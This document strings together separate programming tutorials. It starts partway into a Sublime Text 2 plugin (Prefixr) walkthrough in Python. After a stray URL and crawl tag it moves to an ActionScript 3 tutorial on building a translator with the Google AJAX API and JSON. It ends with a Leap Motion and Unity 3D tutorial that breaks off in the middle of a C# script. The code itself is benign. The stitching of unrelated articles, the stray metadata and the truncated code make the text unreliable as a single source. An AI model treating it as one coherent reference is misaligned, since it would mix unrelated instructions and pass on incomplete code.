little activity indicator in the status area before = i % 8 after = (7) - before if not after: dir = -1 if not before: dir = 1 i += dir self.view.set_status('prefixr', 'Prefixr [%s=%s]' % \ (' ' * before, ' ' * after)) sublime.set_timeout(lambda: self.handle_threads(edit, threads, braces, offset, i, dir), 100) return The first section of code uses a simple integer value stored in the variable i to move an = back and forth between two brackets. The last part is the most important though. This tells Sublime to run the handle_threads()method again, with new values, in another 100 milliseconds. This is just like the setTimeout() function in JavaScript. The lambdakeyword is a feature of Python that allows us to create a new unnamed, or anonymous, function. The sublime.set_timeout() method requires a function or method and the number of milliseconds until it should be executed. Without lambda we could tell it we wanted to run handle_threads(), but we would not be able to specify the parameters. If all of the threads have completed, we don't need to set another timeout, but instead we finish our undo group and update the user interface to let the user know everything is done. self.view.end_edit(edit) self.view.erase_status('prefixr') selections = len(self.view.sel()) sublime.status_message('Prefixr successfully run on %s selection%s' % (selections, '' if selections == 1 else 's')) If you would like to double check your work so far, please compare the source to the file Prefixr-3.py in the source code zip file. Step 8 - Performing Replacements With our threads handled, we now just need to write the code that replaces the original CSS with the result from the Prefixr API. As we referenced earlier, we are going to write a method called replace(). This method accepts a number of parameters, including the Edit object for undo, the thread that grabbed the result from the Prefixr API, if the original selection included braces, and finally the selection offset. def replace(self, edit, thread, braces, offset): sel = thread.sel original = thread.original result = thread.result # Here we adjust each selection for any text we have already inserted if offset: sel = sublime.Region(sel.begin() + offset, sel.end() + offset) The offset is necessary when dealing with multiple selections. When we replace a block of CSS with the prefixed CSS, the length of that block will increase. The offset ensures we are replacing the correct content for subsequent selections since the text positions all shift upon each replacement. The next step is to prepare the result from the Prefixr API to be dropped in as replacement CSS. This includes converting line endings and indentation to match the current document and original selection. result = self.normalize_line_endings(result) (prefix, main, suffix) = self.fix_whitespace(original, result, sel, braces) self.view.replace(edit, sel, prefix + main + suffix) As a final step we set the user’s selection to include the end of the last line of the new CSS we inserted, and then return the adjusted offset to use for any further selections. end_point = sel.begin() + len(prefix) + len(main) self.view.sel().add(sublime.Region(end_point, end_point)) return offset + len(prefix + main + suffix) - len(original) If you would like to double check your work so far, please compare the source to the file Prefixr-4.py in the source code zip file. Step 9 - Whitespace Manipulation We used two custom methods during the replacement process to prepare the new CSS for the document. These methods take the result of Prefixr and modify it to match the current document. normalize_line_endings() takes the string and makes sure it matches the line endings of the current file. We use the Settings class from the Sublime API to get the proper line endings. def normalize_line_endings(self, string): string = string.replace('\r\n', '\n').replace('\r', '\n') line_endings = self.view.settings().get('default_line_ending') if line_endings == 'windows': string = string.replace('\n', '\r\n') elif line_endings == 'mac': string = string.replace('\n', '\r') return string The fix_whitespace() method is a little more complicated, but does the same kind of manipulation, just for the indentation and whitespace in the CSS block. This manipulation only really works with a single block of CSS, so we exit if one or more braces was included in the original selection. def fix_whitespace(self, original, prefixed, sel, braces): # If braces are present we can do all of the whitespace magic if braces: return ('', prefixed, '') Otherwise, we start by determining the indent level of the original CSS. This is done by searching for whitespace at the beginning of the selection. (row, col) = self.view.rowcol(sel.begin()) indent_region = self.view.find('^\s+', self.view.text_point(row, 0)) if self.view.rowcol(indent_region.begin())[0] == row: indent = self.view.substr(indent_region) else: indent = '' Next we trim the whitespace from the prefixed CSS and use the current view settings to indent the trimmed CSS to the original level using either tabs or spaces depending on the current editor settings. prefixed = prefixed.strip() prefixed = re.sub(re.compile('^\s+', re.M), '', prefixed) settings = self.view.settings() use_spaces = settings.get('translate_tabs_to_spaces') tab_size = int(settings.get('tab_size', 8)) indent_characters = '\t' if use_spaces: indent_characters = ' ' * tab_size prefixed = prefixed.replace('\n', '\n' + indent + indent_characters) We finish the method up by using the original beginning and trailing white space to ensure the new prefixed CSS fits exactly in place of the original. match = re.search('^(\s*)', original) prefix = match.groups()[0] match = re.search('(\s*)\Z', original) suffix = match.groups()[0] return (prefix, prefixed, suffix) With the fix_whitespace() method we used the Python regular expression (re)module, so we need to add it to the list of imports at the top of the script. import re And with this, we've completed the process of writing the prefixr command.The next step it to make the command easy to run by providing a keyboard shortcut and a menu entry. Step 10 - Key Bindings Most of the settings and modifications that can be made to Sublime are done via JSON files, and this is true for key bindings. Key bindings are usually OS-specific, which means that three key bindings files will need to be created for your plugin. The files should be named Default (Windows).sublime-keymap, Default (Linux).sublime-keymap and Default (OSX).sublime-keymap. Prefixr/ ... - Default (Linux).sublime-keymap - Default (OSX).sublime-keymap - Default (Windows).sublime-keymap - Prefixr.py The .sublime-keymap files contain a JSON array that contains JSON objects to specify the key bindings. The JSON objects must contain a keys and command key, and may also contain a args key if the command requires arguments. The hardest part about picking a key binding is to ensure the key binding is not already used. This can be done by going to the Preferences > Key Bindings – Default menu entry and searching for the keybinding you wish to use. Once you’ve found a suitably unused binding, add it to your .sublime-keymap files. [ { "keys": ["ctrl+alt+x"], "command": "prefixr" } ] Normally the Linux and Windows key bindings are the same. The cmd key on OS Xis specified by the string super in the .sublime-keymap files. When porting a key binding across OSes, it is common for the ctrl key onWindows and Linux to be swapped out for super on OS X. This may not, however, always be the most natural hand movement, so if possible try and test your keybindings out on a real keyboard. Step 11 - Menu Entries One of the cooler things about extending Sublime is that it is possible to add items to the menu structure by creating .sublime-menu files. Menufiles must be named specific names to indicate what menu they affect: Main.sublime-menucontrols the main program menu Side Bar.sublime-menucontrols the right-click menu on a file or folder in the sidebar Context.sublime-menucontrols the right-click menu on a file being edited There are a whole handful of other menu files that affect various other menus throughout the interface. Browsing through the Default package is the easiest way to learn about all of these. For Prefixr we want to add a menu item to the Edit menu and some entries to the Preferences menu for settings. The following example is the JSON structure for the Edit menu entry. I’ve omitted the entries for the Preferences menu since they are fairly verbose being nested a few levels deep. [ { "id": "edit", "children": [ {"id": "wrap"}, { "command": "prefixr" } ] } ] The one piece to pay attention to is the id keys. By specifying the idof an existing menu entry, it is possible to append an entry without redefining the existing structure. If you open the Main.sublime-menu file from the Default package and browse around, you can determine what idyou want to add your entry to. At this point your Prefixr package should look almost identical to the official version on GitHub. Step 12 - Distributing Your Package Now that you’ve taken the time to write a useful Sublime plugin, it is time to get into the hand of other users. Sublime supports distributing a zip file of a package directory as a simple way to share packages. Simply zip your package folder and change the extension to .sublime-package. Other users may now place this into their Installed Packages directory and restart Sublime to install the package. Along with easy availability to lots of users, having your package available via Package Control ensures users get upgraded automatically to your latest updates. While this can certainly work, there is also a package manager forSublime called Package Controlthat supports a master list of packages and automatic upgrades. To get your package added to the default channel, simply host it on GitHubor BitBucket and then fork the channel file (on GitHub, or BitBucket), add your repository and send a pull request. Once the pull request is accepted, your package will be available to thousands of users using Sublime. Along with easy availability to lots of users, having your package available via Package Control ensures users get upgraded automatically to your latest updates. If you don’t want to host on GitHub or BitBucket, there is a customJSON channel/repository system that can be used to host anywhere, while still providing the package to all users. It also provides advanced functionality like specifying the availability of packages by OS. See the PackageControl page for more details. Go Write Some Plugins! Now that we’ve covered the steps to write a Sublime plugin, it is time for you to dive in! The Sublime plugin community is creating and publishing new functionality almost every day. With each release, Sublime becomes more and more powerful and versatile. The Sublime Text Forum is a great place to get help and talk with others about what you are<<
https://code.tutsplus.com/tutorials/how-to-create-a-sublime-text-2-plugin--net-22685
CC-MAIN-2021-04
refinedweb
3,842
64.51
In Sections 10.2 and 10.3, we described a B2B approach to processing XML documents by using Servlet and JSP. In the future, more and more services on the Web will accept and provide XML documents. We can regard such an XML-based service as an XML data source that can be accessed via HTTP. This indicates that there can be many XML data sources on the Web. Under such circumstances, we may want to support both B2B (a machine client) and B2C (a human client) with a single XML-based service in some cases. In one case, we may need to provide an XML document as it is for a machine client and a human-readable document, such as an HTML document, for a human client. In another case, we may want to integrate multiple data sources provided as XML documents. We believe one of the possibilities is to use Cocoon. Apache Cocoon is commonly regarded as middleware for XML-based Web publishing. We believe, however, that it can be a solution for the goals just described. In this section, we describe Cocoon, revealing the reason why we believe so. We are not providing a general view of Cocoon in this section because this is not an introduction to it. Rather, we focus on how to achieve our two goals by using Cocoon. Today, the Web is globally popularized and various kinds of Web clients are used: PCs, mobile phones, application programs, and so on. They have different CPU speeds, memory limitations, I/O devices, and the expected data format, such as HTML and XML. For example, an HTML document (if it is the expected data format) is displayed differently on each client, and sometimes a client may not be able to display the whole document. So far, we have to provide different documents for different types of clients. However, as types of clients become diverse, this kind of ad hoc approach becomes difficult. One solution to handling such an issue is to generate various documents from a single XML document, as shown in Figure. Here, the XML document is regarded as common logical data that should be maintained as first-class data for an application. We call this approach multichanneling of an XML document. Figure illustrates multiple XML data sources at different locations. In this case, we may want to output a single XML document to clients by integrating these XML documents. The XML document shown in Listing 10.19 is an aggregation of the stock prices of different companies. Each stock price is collected from different stock quote services, described in Sections 10.2 and 10.3. <?xml version="1.0" encoding="UTF-8"?> <StockQuotes xmlns: <StockQuote company="IBM"> <price>134</price> </StockQuote> <StockQuote company="ABC"> <price>52</price> </StockQuote> <StockQuote company="XYZ"> <price>83</price> </StockQuote> </StockQuotes> As we described, there are certain needs for managing XML documents as a common logical data source, integrating and transforming them if necessary, and finally sending them to Web clients. We call this XML-based content management. In this section, we describe how to integrate the multiple data sources into a single XML document and transform them for the Web client if necessary by using Cocoon. We use the example of the stock quote service shown in the previous section. First, we prepare StockQuote.xml, shown in Listing 10.20. <?xml version="1.0" encoding="UTF-8"?> <!-- Stylesheet for Web browsers --> <?xml-stylesheet href="StockQuote-HTML.xsl" type="text/xsl"?> <!-- Stylesheet for Java clients --> <?xml-stylesheet href="StockQuote-XML.xsl" type="text/xsl" media="java"?> <!-- Processing instructions for Cocoon --> <?cocoon-process type="xsp"?> <?cocoon-process type="xslt"?> <!-- XSP (eXtensible Server Pages) --> <xsp:page xmlns:xsp="" xmlns: <StockQuotes xmlns=""> <util:include-uri <util:include-uri <util:include-uri </StockQuotes> </xsp:page> StockQuote.xml aggregates the stock prices for IBM, ABC, and XYZ, transforms them, and returns the result to Web clients. It returns an HTML table to Web browsers, while it returns an XML document as is to Java clients. You can open the following URL for StockQuote.xml with a Web browser and see an HTML table, as shown in Figure. You can access the same URL with a Java client by running the following command. Note that the command is actually a single line but is wrapped for printing. R:\samples>java chap10.stockquote.StockQuoteClient StockQuoteClient is a simple program that sends an HTTP GET request to the specified URL and returns the response. You will see the same XML document shown in Listing 10.20 as the result.[6] [6] Note that some redundant namespace declarations will be embedded in the XML document. As we described, Cocoon allows you not only to collect stock prices from the multiple XML document sources but also to transform the information to generate different output for different types of clients. Next we describe the details of StockQuote.xml. The following code fragment associates this XML document with XSLT stylesheets. Processing instruction (PI) xml-stylesheet is defined in the W3C Recommendation "Associating Style Sheets with XML Documents Version 1.0." <!-- Stylesheet for Web browsers --> <?xml-stylesheet href="StockQuote-HTML.xsl" type="text/xsl"?> <!-- Stylesheet for Java clients --> <?xml-stylesheet href="StockQuote-XML.xsl" type="text/xsl" media="java"?> The first xml-stylesheet associates this document with the StockQuote-HTML.xsl stylesheet. It is used to convert this document to an HTML document as the default stylesheet for Web browsers. The second xml-stylesheet associates this document with the StockQuote-XML.xsl stylesheet. It is used to output this document as is to Java clients. Cocoon selects an appropriate stylesheet by distinguishing the clients by checking the User-Agent header in an HTTP request. Then it applies the selected stylesheet to this document to generate the output. Note that if more than one stylesheet matches the same client, a more specific stylesheet is adopted. In this case, StockQuote-XML.xsl is adopted for the Java client, although it matches both StockQuote-HTML.xsl and StockQuote-XML.xsl. Listing 10.21 shows StockQuote-HTML.xsl. <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="" xmlns: <!-- Specifies the output format as HTML --> <xsl:output method="html" [12] media-type="text/html" [13] [15] <!-- Templates --> [16] <xsl:template [17] <HTML lang="en"> [18] <HEAD> [19] <TITLE>Stock Quote in HTML</TITLE> [20] </HEAD> [21] <BODY> [22] <TABLE border="1"> [23] <TR><TD>Company</TD><TD>Price</TD></TR> [24] <xsl:apply-templates [25] </TABLE> [26] </BODY> [27] </HTML> [28] </xsl:template> [30] <xsl:template [31] <TR> [32] <TD><xsl:value-of</TD> [33] <TD><xsl:value-of</TD> [34] </TR> [35] </xsl:template> </xsl:stylesheet> The xsl:output element specifies the output format as HTML and the Content-Type as a META element in the HTML document (lines 12–13). The template that matches the document root "/" outputs the whole HTML document containing a table (lines 15–28). The template that matches the StockQuote element outputs each row of the table (lines 30–35). Listing 10.22 shows StockQuote-XML.xsl. <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns: <xsl:output [8] method="xml" [9] media-type="application/xml" [10] <xsl:template [13] <xsl:processing-instruction [14] type="application/xml" </xsl:processing-instruction> [16] <xsl:apply-templates/> </xsl:template> <xsl:template <xsl:copy> <xsl:apply-templates </xsl:copy> </xsl:template> <xsl:template <xsl:copy/> </xsl:template> </xsl:stylesheet> The xsl:output element specifies the output format as XML (line 8), the media type (line 9), and encoding (line 10). The template that matches the document root "/" outputs PI cocoon-format as a directive for Cocoon. It indicates that the media type of the document generated by using this stylesheet is application/xml (line 13–14). The xsl:apply-templates instruction applies templates to the document element (line 16). The remaining templates output the input XML documents as is. The following part of StockQuote.xml calls the stock quote JSP service dynamically using Extensible Server Pages (XSP).[7] XSP is similar to JSP and generates dynamic content being developed by the Apache Cocoon project. It is still in draft form and is subject to change. See the Cocoon Web site () for details. [7] Note that we used StockQuote3.jsp, which is a variant of StockQuote2.jsp. It does not output the XML declaration because of the requirement from Cocoon. The results of the JSP calls are embedded in StockQuote.xml. <!-- XSP (eXtensible Server Pages) --> <xsp:page xmlns:xsp="" xmlns: <StockQuotes xmlns=""> <util:include-uri <util:include-uri <util:include-uri </StockQuotes> </xsp:page> In this section, we introduced Cocoon because we believe the concept of XML-based content management will become more popular in the near future. We described such a concept of content management by using Cocoon, although there are many features of Cocoon that we did not
http://codeidol.com/community/java/apache-cocoon/12633/
CC-MAIN-2017-22
refinedweb
1,483
56.96
Odoo Help Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc. How to open url and close a wizard in 1 function in Odoo 8.0 Hi all, I created a wizard with a button. When I click to this button, I want to close the wizard and open a url in new tab. But in my case, I can only close the wizard or open url by using return in my function (not both at same time) If want to open url, so I return my function as below return { 'type' : 'ir.actions.act_url', 'url' : url, 'target' : 'new', } And if I want to close the wizard (not open url), I write return {'type': 'ir.actions.act_window_close'} In other way, I tred creating other function, as below, to open url and called it before return ir.actions.act_window_close in my function. But it was not work, url could not be opened def _open_url(self, cr, uid, ids, url, context=None): return { 'type' : 'ir.actions.act_url', 'url' : url, 'target' : 'new', } Finally, How can I close the wizard and open url at same time in only 1 function? Thanks About This Community Odoo Training Center Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
https://www.odoo.com/forum/help-1/question/how-to-open-url-and-close-a-wizard-in-1-function-in-odoo-8-0-87270
CC-MAIN-2017-39
refinedweb
231
71.65
In this tutorial, you will learn how to use the Google AJAX API with ActionScript 3 to create a nice looking translator application. Enjoy! Step 1: Brief Overview Using some of the flash.net classes, a String that communicates with the Google AJAX API, and the JSON class (part of the as3corelib) we will create a translator application in Flash CS5. Step 2: Document Settings Launch Flash and create a new document. Set the stage size to 600x300px and the frame rate to 24fps. Step 3: Interface This is the interface we'll use, a gradient background, a title or logo, an Input TextField and an Info button; there are also two panels that will be invisible at first and activated during the course of the app. Let's get building. Step 4: Background Select the Rectangle Tool (R) and create a 600x300 rectangle and fill it with this radial gradient: #DFE0E4 to #BDC1C8, center it on stage. Step 5: Title/Logo Use the Rectangle Primitive Tool to create a 100x40px rectangle, fill it with #595E64 and change the corner radius to 12. To add the Google Logo you can use the Catull Font if you have it, or just add the text with another typeface. There is a little detail in many elements of the interface, this is the letterpress text effect. To create it just duplicate the text (CMD + D) change its color to #212325 and move it 1px up, then right-click the darker text and select Arrange > Send Backward. Now let's add the text to the left, use this format: Lucida Grande Regular 11pt #595E64. Again, use the letterpress effect and position the text as shown in the image. Step 6: Separator Create a 1px line using the Rectangle Tool and fill it with #595E64, duplicate it, change the color to #ECF1FE, and move it 1px down. You can group (CMD+G) the lines for better manipulation. Step 7: Translate TextField Background With the Rectangle Primitive Tool, create a 250x24px, #595E64 and 7 as corner radius. Center the shape and add the letterpress effect. You can add a search icon too, as a detail. Lastly, use the Text Tool (T) to create an Input Textfield with this format: Helvetica Bold, 13pt, #EEEEEE. Align the TextField to the background. Step 8: Info Button Select the Oval Tool (O), draw a 15x15 px oval and fill it with #919397. Use the Text Tool to add an italic i and center them. Convert the shapes to a Button and name it infoButton. Step 9: Language Panel Open the Components Panel (CMD+F7) and drag a ComboBox to the stage, duplicate it and add it to to a 160x127px rounded rectangle filled with #41464A to #595E64. Add static Text Fields to label the components and the panel. Name the ComboBoxes fromBox and intoBox and convert all to a single MovieClip. Set the MovieClip instance name to languagePanel. Be sure to check the position you set to the panel, as it will be animated from the starting point to the stage, in this demo y is -14. Step 10: Results Panel The results panel will be used to display the translated text. Create a 600x170px rectangle using the gradient fill and add a Dynamic Textfield named txt. Convert the shape and TextField to MovieClip and name it panel. This completes the graphic part. Step 11: XML We'll use an XML file containing the languages available through Google Translate. To get these languages we'll need an Internet Browser that can see source code (any modern browser does that), go to Google Translate site and make the source code visible. Go to the part shown in the following image and start copying. Alternatively, copy the data shown below, though be aware that this list could be updated from time to time. <?xml version="1.0"?> <options> <option value="">Detect language</option> <option value="en">English</option> <option value="af">Afrikaans</option> <option value="sq">Albanian</option> <option value="ar">Arabic</option> <option value="hy">Armenian ALPHA</option> <option value="az">Azerbaijani ALPHA</option> <option value="eu">Basque ALPHA</option> <option value="be">Belarusian</option> <option value="bg">Bulgarian</option> <option value="ca">Catalan</option> <option value="zh-CN">Chinese< ALPHA</option> <option value="de">German</option> <option value="el">Greek</option> <option value="ht">Haitian Creole ALPHA< ALPHA</option> <option value="vi">Vietnamese</option> <option value="cy">Welsh</option> <option value="yi">Yiddish</option> </options> Paste the text in your XML editor and save it as Languages.xml. Don't forget to add the <options> </options> tags at the beginning and end respectively, this way we can get the full language name using xml.children()[elementNumber] and the abbreviation value using xml.children()[elementNumber].@value. See Dru Kepple's tutorial on XML in AS3 for more information. Step 12: New ActionScript Class Create a new (Cmd + N) ActionScript 3.0 Class and save it as Main.as in your class folder. Step 13: Package The package keyword allows you to organize your code into groups that can be imported by other scripts, it's recommended 14: JSON JSON (JavaScript Object Notation) is a lightweight data-interchange format. It is easy for humans to read and write. It is easy for machines to parse and generate. The JSON class will be needed to decode the server response, you can get it as part of the as3corelib at its download page. Step 15: Import Directive These are the classes we'll need to import for our class to work, the import directive makes externally defined classes and packages available to your code. import flash.display.Sprite; import flash.events.KeyboardEvent; import flash.net.URLLoader; import flash.net.URLRequest; import flash.events.Event; import com.adobe.serialization.json.JSON; import fl.transitions.Tween; import fl.transitions.easing.Back; import fl.transitions.easing.Strong; import fl.data.DataProvider; import flash.events.MouseEvent; Step 16: 17: Variables These are the variables we'll use, read the comments in the code to find out more about them. private var srcLang:String = ""; //the source language, default is Autodetect private var destLang:String = "it"; //default destination language, italian private var tween:Tween; //handles animation private var xmlLoader:URLLoader; private var languages:XML; //will store the XML file of the languages private var dp:DataProvider = new DataProvider(); //stores an array of languages to pass to the comboBox Step 18: Constructor The constructor is a function that runs when an object is created from a class. This code is the first to execute when you make an instance of an object or runs using the Document Class. public function Main():void { loadXML("Languages.xml"); languagePanel.intoBox.prompt = "Italian"; //Set the combobox default label to "italian" which is the default destination language searchTerms.addEventListener(KeyboardEvent.KEY_UP, translate); //The translate function will be run every key up infoButton.addEventListener(MouseEvent.MOUSE_UP, selectLanguage); //Adds the listener to the infobutton to call the language panel } Step 19: Load XML This function loads the XML passed in the src parameter (which was called in the constructor). It adds a listener to execute the parseXML() function when the load is complete. private function loadXML(src:String):void { xmlLoader = new URLLoader(new URLRequest(src)); xmlLoader.addEventListener(Event.COMPLETE, parseXML); } Step 20: Handle XML After the XML is fully loaded, we use the XML instance to convert the data to a valid XML object and after that we call the setComboBoxData() function. private function parseXML(e:Event):void { languages = new XML(e.target.data); setComboBoxData(); } Step 21: Set ComboBox Data This code loops through the values in the XML file, sets the full language name as the ComboBox label and the value parameter as the ComboBox value. It also adds the corresponding event listeners to detect the change of language. private function setComboBoxData():void { for(var i:int = 0; i < languages.children().length(); i++) { dp.addItem({label: languages.children()[i], value: languages.children()[i].@value}); //Set corresponding combobox values } languagePanel.fromBox.dataProvider = dp; //Set the data provider to the component languagePanel.intoBox.dataProvider = dp; languagePanel.fromBox.addEventListener(Event.CHANGE, comboBoxChange);//Change listeners languagePanel.intoBox.addEventListener(Event.CHANGE, comboBoxChange); } Step 22: Detect ComboBox Changes When the language in the ComboBox is changed, we check which component was changed (from or into) and change the corresponding variable, this way when the translate() function is executed it will automatically use the new values. private function comboBoxChange(e:Event):void { if(e.target.name == "fromBox") { srcLang = e.target.selectedItem.value; } else { destLang = e.target.selectedItem.value; } } Step 23: Show Language Panel By default, the language panel is hidden.The following function is executed when the user clicks in the infoButton, it shows or hides the language panel. private function selectLanguage(e:MouseEvent):void { if(languagePanel.y == -14) //if the panel is visible { tween = new Tween(languagePanel, "y", Back.easeIn, languagePanel.y, -134, 0.3, true);//make it invisible } else //if hidden { tween = new Tween(languagePanel, "y", Back.easeOut, languagePanel.y, -14, 0.3, true); //show it } } Step 24: Translate The core function. To perform the translation Google gives us an AJAX API that we need to call to then receive the translated text. This is the string we use:" + searchTerms.text + "&langpair=" + srcLang + "|" + destLang After the q= term we must include the text we want to translate; after the langpair parameter, the abbreviation of the languages we are using separated by a "|" character. To automate this process we use the variables declared before in the class. This function is executed after a KEY_UP event. private function translate(e:KeyboardEvent):void { if (searchTerms.length != 0) { var urlLoader:URLLoader = new URLLoader(new URLRequest("" + searchTerms.text + "&langpair=" + srcLang + "|" + destLang)); urlLoader.addEventListener(Event.COMPLETE, displayTranslation); //calls the displayTranslation function after the server responds } if(languagePanel.y == -14)//hides the language panel if visible { tween = new Tween(languagePanel, "y", Back.easeIn, languagePanel.y, -134, 0.3, true); } } Step 25: Display Translation When the server responds with the translated text we call this function. As the server doesn't responds in plain text, it's time to use the JSON class we downloaded from the as3CoreLib. private function displayTranslation(e:Event):void { var translation:String = "[" + e.target.data + "]"; //the server response var json:Array = JSON.decode(translation) as Array; //decode the JSON string and store it as an aray tween = new Tween(panel,"y",Strong.easeOut,panel.y,140,1,true); //bring up the translate panel panel.txt.text = json[0].responseData.translatedText; //display the translated text in the textfield } You are probably wondering why we used an array to store the server string, this is because the JSON string received from the server contains separated types of data, you can see it in the following string: {"responseData": {"translatedText":"this is the text translated"}, "responseDetails": null, "responseStatus": 200} As we are only interested in the translated text, we have to convert the JSON data into an array and then get the value of the property translatedText from that array. Step 26: Document Class We're done with the class, to use it, just go back to the FLA file and add Main to the Class field in the Properties Panel. Conclusion It could be a really nice touch to use a Translator in your application without leaving it, try implementing it in your own app. Thanks for reading this tutorial, I hope you've found it useful! Envato Tuts+ tutorials are translated into other languages by our community members—you can be involved too!Translate this post
http://code.tutsplus.com/tutorials/develop-a-translator-app-using-the-google-ajax-api-and-json--active-5428
CC-MAIN-2016-26
refinedweb
1,919
56.45
The future of human computer interaction (HCI) is about to have a paradigm shift. Ever since the beginning of computing scientists and engineers have always been working towards creating 3D environments and Virtual and Augmented Worlds where we integrated the digital and the physical spheres of our lives. From early science-fiction books and movies you can see that we have always dreamt of creating such environments and interactions. Today, we live in very exciting times. We are getting closer to making these science-fiction ideas, into science-facts. In fact, we have already done so to some extent. Virtual Reality (VR) is a large topic. One of the important topics within VR is the ability to interact with the digital world. This article is going to concentrate on the interaction of the user with the digital world using the hardware sensor developed by Leap Motion. This article will be covering how to integrate and use Leap Motion hand motion sensor with Unity 3D. We are not going to cover the basics of Unity 3D in this article. Please refer to the following article series to get started with Unity 3D. Just in case if this is the first time reading the Unity 3D articles, I have listed the links to the series): The articles listed above will give you a good starting foundation regarding Unity 3D. NOTE: In order to experiment with the code provided in this article, you will need to have the Leap Motion hardware. 5.1 which is the latest public release as of the initial publication date. Most of the topics discussed in the series will be compatible with older versions of the game engine. Follow the instructions. Easy to setup. “In just one hand, you have 29 bones, 29 joints, 123 ligaments, 48 nerves, and 30 arteries. That’s sophisticated, complicated, and amazing technology (times two). Yet it feels effortless. The Leap Motion Controller has come really close to figuring it all out.” The Leap Motion Controller senses how you naturally move your hands and lets you use your computer in a whole new way. It tracks all 10 fingers up to 1/100th of a millimeter. It's dramatically more sensitive than existing motion control technology. That's how you can draw or paint mini masterpieces inside a one-inch cube. Figure 1-Leap Motion Sensor Leap Motion Setup and Unity 3D Integration First, you will need to download the SDK for Leap Motion. You can get the latest using the following link: developer.leapmotion.com. I am using SDK v.2.2.6.29154. After you download the SDK, go ahead and install the runtime. The SDK supports other platforms and languages which you are encouraged to look into. For our purposes and integration with Unity, you will need to also get the Leap Motion Unity Core Assets from the Asset store. Here is a direct link to Leap Motion Unity Core Assets v2.3.1. Assuming you have already downloaded and installed Unity 5 on your machine, the next thing you will need to do is get the Leap Motion Unity Core Assets from the Asset store. At the time of this writing the asset package was on version 2.3.1. Figure 2-Leap Motion Core Assets After downloading and installing the Leap Motion Core Assets we can start with creating our simple scene and getting to learn how to interact with the assets and extend them for our own purposes. Figure 3-Project Folder Structure for Leap Motion Go ahead and create a new empty project and import the Leap Motion Core Assets into your project. After you have imported the Leap Motion Assets your project window should look similar to the figure above. In the Project Window your main attention should be toward the LeapMotion folder. The folders that contain OVR are geared towards using Leap Motion with Oculus Rift Virtual Reality headset. We will cover this in future article(s). You should take the time and study the structure and more importantly the content within each folder. One of the main core assets that you will want to get familiar with is the HandController. This is the main PreFab that allows you to interact with the Leap Motion device in your scene. It is located under the Prefab folder within the LeapMotion folder. It serves as the anchor point for rendering your hands in the scene. Figure 4-HandController Inspector Properties The HandController prefab has the Hand Controller script attached which enables you to interact with the device. Take a look at some of the properties that are visible through the Inspector Window. You would notice that there are two hand properties for the actual hand model to be rendered in the scene, and then there are two for the physical model, these are the colliders. The benefit of this design is that you can create your own hand models, and use them with the controller for visual representation and also custom gestures and etc… NOTE: Unity and Leap Motion both use the metric system. But, there is a difference in the following: Unity unit measure is in meters, whereas Leap Motion is in millimeters. Not a big deal, but you will need to be aware of this when you are measuring your coordinates. Another key property is the Hand Movement Scale vector. The larger the scale, the larger the area that the device will cover in the physical world. A word of caution here, you will need to read the documentation and specifications for finding out the right and proper adjustments for the particular application that you are working on. The Hand Movement Scale vector is used to change the range of motion of the hands without changing the apparent model size. Placing the HandController object is important in the scene, as stated, this is where the anchor point is and therefore, your camera should be in the same area as the HandController. In our demo scene, go ahead and place the HandController at the following position: (0,-3,3) for the (x,y,z) coordinates respectively. Make sure the camera is positioned at (0,0,-3). Take a look at the coordinates and visualize how the components are represented in 3D space. Here is a diagram for you to consider: Figure 5-Visual representation of HandController and Camera positions In other words, you want the HandController to be in front of the Camera GameObject and also below a certain threshold. There are no magic numbers here, you will just need to figure out what works best for you. At this point you have connected all of the fundamental pieces to actually run your scene and try out Leap Motion. So go ahead and give it a try, if you have installed all of the software components properly you should be able to see your hands in the scene. The fact that you can actually visualize your hand movement in the scene by itself is a huge undertaking by the assets that have been provided. However, in reality, to make things more interesting, you will need to be able to interact with the environment and be able to change and manipulate stuff within the scene. To illustrate this particular point, we will create a few more GameObjects, and within the scene we will look at how to implement some basic interactions with GameObjects. The idea would be to have a cube suspended in the air. We would like to change the color of the Cube by selecting from another set of cubes representing our color pallet. For simplicity of the scene we will place three cubes representing our color pallet. The first one will be red, the second one will be blue and the third one will be orange. You may choose any color you wish by the way. We would need to place the cubes in a way that interaction with them will be easy and non-confusing to the user. We can place the cubes in the following order: The Cube (0,1,3) Red Cube: (3,-1,3) Blue Cube: (0,-1,3) Orange Cube: (-3,-1,3) Notice, that they are above the HandController GameObject in the Y-Axis, but they are at the same coordinate in the Z-Axis. You can play with these numbers if you wish to adjust it to your likings. As long as the cubes are above and within the range of detection of the HandController you should be fine. The next step is to create the script that will help us interact with the Cube GameObjects. I call the script CubeInteraction.cs: using UnityEngine; using System.Collections; public class CubeInteraction : MonoBehaviour { public Color c; public static Color selectedColor; public bool selectable = false; void OnTriggerEnter(Collider c) { if (c.gameObject.transform.parent.name.Equals("index")) { if (this.selectable) { CubeInteraction.selectedColor = this.c; this.transform.Rotate(Vector3.up, 33); return; } transform.gameObject.GetComponent<Renderer>().material.color = CubeInteraction.selectedColor; } } } As you can see, the code is not very complex, but it does help us achieve what we want. There are three public variables which are used to detect if the object is selectable, the color that the object represents, and the selected color. The core of the logic happens in the OnTriggerEnter(Collider c) function. We check to see if the object that collided with the Cube is the index finger, then we check to see if the object is selectable. If the object is selectable, we set the selectable color to the predefined color code and exit the function. Another good idea when you are designing such interactions between virtual objects, is actual visual feedback to the user. In this case, I made the selected color cube to rotate 33° degrees each time the index finger collides with the GameObject. This is a good visual clue that we have selected the color. This same function is also used to apply the selected color to the Cube GameObject that can be painted. For this particular case, we get the Renderer object from the Cube and set the material color to the selected color. The following is a sample screen capture of the scene you just setup: Figure 6-Running Demo Scene with Left Hand You can see my left hand in the screen capture above. My right hand is on the mouse taking the screen shot! The next screen capture captures selecting the blue cube: Figure 7-Selecting Blue Color Cube And finally applying the selected color to the colorable cube in the scene: Figure 8-Blue Color Applies to Paintable Cube At this point you will say to yourself, all this is cool, but what if I wanted to be able to have more interactions with my 3D environment. Say for instance, you want to pick up objects and move them around in the scene. Well, this is very much so possible and in order for us to make it happen we need to write more code! Extending our example, we will implement the code that actually will allow you to pick-up the Cube object and move it around in the environment. Listing to grab a given object in the scene is provided in GrabMyCube.cs: using UnityEngine; using UnityEngine.UI; using System.Collections; using Leap; public class GrabMyCube : MonoBehaviour { public GameObject cubePrefab; public HandController hc; private HandModel hm; public Text lblNoDeviceDetected; public 